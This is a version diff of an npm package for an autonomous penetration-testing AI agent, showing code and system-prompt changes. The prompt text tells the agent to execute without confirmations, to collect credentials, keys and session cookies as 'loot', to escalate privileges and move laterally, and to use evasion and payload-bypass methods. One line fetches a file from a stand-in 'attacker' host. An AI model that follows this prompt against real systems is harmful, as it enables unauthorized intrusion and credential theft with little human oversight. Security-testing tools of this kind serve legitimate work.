npm - pentesting - Versions diffs - 0.48.1 → 0.48.3 - Mend

pentesting 0.48.1 → 0.48.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (5) hide show

package/README.md CHANGED Viewed

@@ -33,18 +33,6 @@ Pentesting support tool
 ## Quick Start with Docker (Recommended)
-```bash
-docker run -it --rm \
-  -e PENTEST_API_KEY="your_glm_api_key" \
-  -e PENTEST_BASE_URL="https://open.bigmodel.cn/api/paas/v4" \
-  -e PENTEST_MODEL="glm-5" \
-  -v ./pentest-data:/root/.pentest \
-  agnusdei1207/pentesting
-```
-### Using Brave Search
 ```bash
 docker run -it --rm \
   -e PENTEST_API_KEY="your_glm_api_key" \

package/dist/main.js CHANGED Viewed

@@ -331,7 +331,7 @@ var ORPHAN_PROCESS_NAMES = [
 // src/shared/constants/agent.ts
 var APP_NAME = "Pentest AI";
-var APP_VERSION = "0.48.1";
+var APP_VERSION = "0.48.3";
 var APP_DESCRIPTION = "Autonomous Penetration Testing AI Agent";
 var LLM_ROLES = {
   SYSTEM: "system",
@@ -3237,7 +3237,7 @@ var EpisodicMemory = class {
     this.events = [];
   }
 };
-var MEMORY_FILE = join3(MEMORY_DIR, "persistent-knowledge.json");
+var MEMORY_FILE = join3(WORKSPACE.MEMORY, "persistent-knowledge.json");
 var PersistentMemory = class {
   knowledge;
   constructor() {
@@ -3328,7 +3328,7 @@ var PersistentMemory = class {
   }
   save() {
     try {
-      mkdirSync2(MEMORY_DIR, { recursive: true });
+      mkdirSync2(WORKSPACE.MEMORY, { recursive: true });
       writeFileSync4(MEMORY_FILE, JSON.stringify(this.knowledge, null, 2));
     } catch {
     }
@@ -9795,7 +9795,10 @@ function clearWorkspace() {
     { path: WORKSPACE.DEBUG, label: "debug logs" },
     { path: WORKSPACE.TMP, label: "temp files" },
     { path: WORKSPACE.OUTPUTS, label: "outputs" },
-    { path: WORKSPACE.JOURNAL, label: "journal" }
+    { path: WORKSPACE.JOURNAL, label: "journal" },
+    { path: WORKSPACE.TURNS, label: "turn records" },
+    { path: WORKSPACE.LOOT, label: "loot" },
+    { path: WORKSPACE.REPORTS, label: "reports" }
   ];
   for (const dir of dirsToClean) {
     try {
@@ -10767,6 +10770,30 @@ RULES:
         this.state.addLoot({ type: LOOT_TYPES.CREDENTIAL, host: "auto-extracted", detail: cred, obtainedAt: Date.now() });
       }
     }
+    if (digestResult?.memo?.attackVectors.length && digestResult.memo.attackValue === "HIGH") {
+      const existingTitles = new Set(this.state.getFindings().map((f) => f.title));
+      for (const vector of digestResult.memo.attackVectors) {
+        const title = `[Auto] ${vector.slice(0, 100)}`;
+        if (!existingTitles.has(title)) {
+          this.state.addFinding({
+            id: generateId(),
+            title,
+            severity: "high",
+            affected: [],
+            description: `Auto-extracted by Analyst LLM: ${vector}`,
+            evidence: digestResult.memo.keyFindings.slice(0, 5),
+            isVerified: false,
+            remediation: "",
+            foundAt: Date.now()
+          });
+          this.state.attackGraph.addVulnerability(title, "auto-detected", "high", false);
+          existingTitles.add(title);
+        }
+      }
+    }
+    if (this.state.getFindings().length > 0 && this.state.getPhase() === PHASES.RECON) {
+      this.state.setPhase(PHASES.VULN_ANALYSIS);
+    }
   }
   /**
    * Enrich tool error — delegates to extracted module (§3-1)
@@ -11308,6 +11335,26 @@ function rotateOutputFiles() {
   } catch {
   }
 }
+function rotateTurnRecords() {
+  try {
+    const turnsDir = WORKSPACE.TURNS;
+    if (!existsSync8(turnsDir)) return;
+    const files = readdirSync2(turnsDir).filter((f) => f.startsWith(TURN_PREFIX) && f.endsWith(".md")).sort();
+    if (files.length <= MAX_JOURNAL_ENTRIES) return;
+    const toDelete = files.slice(0, files.length - MAX_JOURNAL_ENTRIES);
+    for (const file of toDelete) {
+      try {
+        unlinkSync5(join10(turnsDir, file));
+      } catch {
+      }
+    }
+    debugLog("general", "Turn records rotated", {
+      deleted: toDelete.length,
+      remaining: MAX_JOURNAL_ENTRIES
+    });
+  } catch {
+  }
+}
 // src/agents/prompt-builder.ts
 var __dirname3 = dirname5(fileURLToPath3(import.meta.url));
@@ -11337,8 +11384,14 @@ var CORE_KNOWLEDGE_FILES = [
   // Attack prioritization, first-turn protocol, upgrade loop
   AGENT_FILES.ORCHESTRATOR,
   // Phase transitions, multi-target management
-  AGENT_FILES.EVASION
+  AGENT_FILES.EVASION,
   // Detection avoidance (always relevant)
+  AGENT_FILES.ZERO_DAY,
+  // Known CVE lookup + unknown vuln discovery methodology
+  AGENT_FILES.PAYLOAD_CRAFT,
+  // Payload mutation and filter bypass techniques
+  AGENT_FILES.INFRA
+  // Active Directory / infrastructure attack methodology
 ];
 var PHASE_TECHNIQUE_MAP = {
   [PHASES.RECON]: ["network-svc", "shells", "crypto"],
@@ -12028,7 +12081,7 @@ ${extraction.content.trim()}
         try {
           ensureDirExists(WORKSPACE.TURNS);
           const ts = (/* @__PURE__ */ new Date()).toISOString().replace(/[:.]/g, "-").slice(0, 19);
-          const turnFileName = `turn-${String(this.turnCounter).padStart(3, "0")}_${ts}.md`;
+          const turnFileName = `turn-${String(this.turnCounter).padStart(4, "0")}_${ts}.md`;
           const turnPath = join13(WORKSPACE.TURNS, turnFileName);
           const turnContent = formatTurnRecord({
             turn: this.turnCounter,
@@ -12073,6 +12126,7 @@ ${turnData}`
         }
         rotateJournalEntries();
         rotateOutputFiles();
+        rotateTurnRecords();
       } catch {
       }
       this.turnCounter++;

package/dist/prompts/base.md CHANGED Viewed

@@ -115,11 +115,41 @@ bg_process({ action: "interact", command: "wget http://attacker/file -O /tmp/fil
 ### 1. Act, Don't Ask
 - ScopeGuard enforces boundaries. Out-of-scope targets are automatically blocked
-- Record findings immediately with add_finding
 - **Execute tasks immediately without unnecessary confirmations/questions**
 - If no results → **try a different approach** (never repeat the same method)
 - ask_user is for: (1) physically unobtainable information (passwords, SSH keys, API tokens), (2) **confirming you're truly done** when all vectors are exhausted
+### 🔴 CRITICAL: State Management — MANDATORY AFTER EVERY DISCOVERY
+**You MUST call these tools to record your progress. If you skip these, your findings are LOST.**
+**`add_finding`** — Call IMMEDIATELY when you **CONFIRM** a vulnerability:
+- Confirmed LFI/RFI → `add_finding` with evidence (the actual command output)
+- Confirmed SQLi → `add_finding` with evidence
+- Confirmed RCE → `add_finding` with evidence
+- Confirmed auth bypass → `add_finding` with evidence
+- **Rule: If you can reproduce it, it's a confirmed finding. Record it NOW.**
+**`add_target`** — Call when you discover a new host or service:
+- New IP found during recon → `add_target`
+- New ports/services discovered → `add_target` (merges with existing)
+**`add_loot`** — Call when you find credentials, tokens, keys, hashes:
+- Password, hash, API key, SSH key, JWT, session cookie → `add_loot`
+**`update_phase`** — Call when your ACTIVITY changes:
+- Scanning/enumerating services → `update_phase({ phase: "recon" })`
+- Testing for vulnerabilities → `update_phase({ phase: "vulnerability_analysis" })`
+- Exploiting confirmed vulns → `update_phase({ phase: "exploit" })`
+- Post-access enumeration → `update_phase({ phase: "post_exploitation" })`
+- Escalating privileges → `update_phase({ phase: "privilege_escalation" })`
+- Moving to other hosts → `update_phase({ phase: "lateral_movement" })`
+⚠️ **Self-Check Every Turn:**
+- "Did I confirm a vulnerability but NOT call `add_finding`?" → Call it NOW
+- "Am I exploiting but Phase is still 'recon'?" → Call `update_phase` NOW
+- "Did I find credentials but NOT call `add_loot`?" → Call it NOW
 ### 2. ask_user Rules
 - Use received values **immediately in the next command** — receiving and not using is forbidden
 - Once received → **reuse** — never ask for the same thing again
@@ -602,9 +632,9 @@ Your past actions and insights are saved as files. Use them freely:
 ```
 .pentesting/memory/turns/
-  ├── summary.md                         ← Full session summary (updated every turn)
-  ├── turn-001_2026-02-21T08-30-15.md    ← Turn 1 details
-  ├── turn-002_2026-02-21T08-31-22.md    ← Turn 2 details
+  ├── summary.md                          ← Full session summary (updated every turn)
+  ├── turn-0001_2026-02-21T08-30-15.md    ← Turn 1 details
+  ├── turn-0002_2026-02-21T08-31-22.md    ← Turn 2 details
   └── ...
 ```
@@ -615,5 +645,5 @@ Your past actions and insights are saved as files. Use them freely:
 **How to use:**
 - `summary.md` gives you the full picture — read it to understand where you stand
-- Need details of a specific past turn? → `read_file(".pentesting/memory/turns/turn-005_...")`
+- Need details of a specific past turn? → `read_file(".pentesting/memory/turns/turn-0005_...")`
 - All past findings, credentials, dead ends are preserved — never lost

package/dist/prompts/strategy.md CHANGED Viewed

@@ -620,7 +620,7 @@ Layer 2 — Structural Reduction (cost: ~1ms)
 Layer 3 — Semantic Digest (cost: ~2-5s, separate LLM call)
   Only fires for truly massive outputs (>50K after Layer 1+2).
   Produces a focused 30-line intelligence summary.
-  Full output is ALWAYS saved to ~/.pentesting/outputs/ for reference.
+  Full output is ALWAYS saved to .pentesting/outputs/ for reference.
 ```
 ### Agent Behavioral Rules for Output Handling

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "pentesting",
-  "version": "0.48.1",
+  "version": "0.48.3",
   "description": "Autonomous Penetration Testing AI Agent",
   "type": "module",
   "main": "dist/main.js",